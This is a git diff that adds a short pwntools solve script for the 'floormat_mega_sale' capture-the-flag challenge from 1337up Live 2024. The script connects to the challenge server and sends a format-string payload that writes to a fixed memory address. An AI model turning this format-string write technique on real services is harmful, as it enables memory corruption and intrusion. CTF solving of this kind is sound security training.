diff --git a/1337up_live_2024/floormat_mega_sale/a.py b/1337up_live_2024/floormat_mega_sale/a.py
new file mode 100644
index 0000000..97df98a
--- /dev/null
+++ b/1337up_live_2024/floormat_mega_sale/a.py
@@ -0,0 +1,16 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./floormat_sale", checksec=False)
+# r = process()
+r = remote("floormatsale.ctf.intigriti.io", 1339)
+
+# funcs
+s = lambda a: r.sendlineafter(b":", a)
+
+# buf
+s(b"6")
+s(b"%1c%11$n"+p64(0x40408c))
+
+r.interactive()
\ No newline at end of file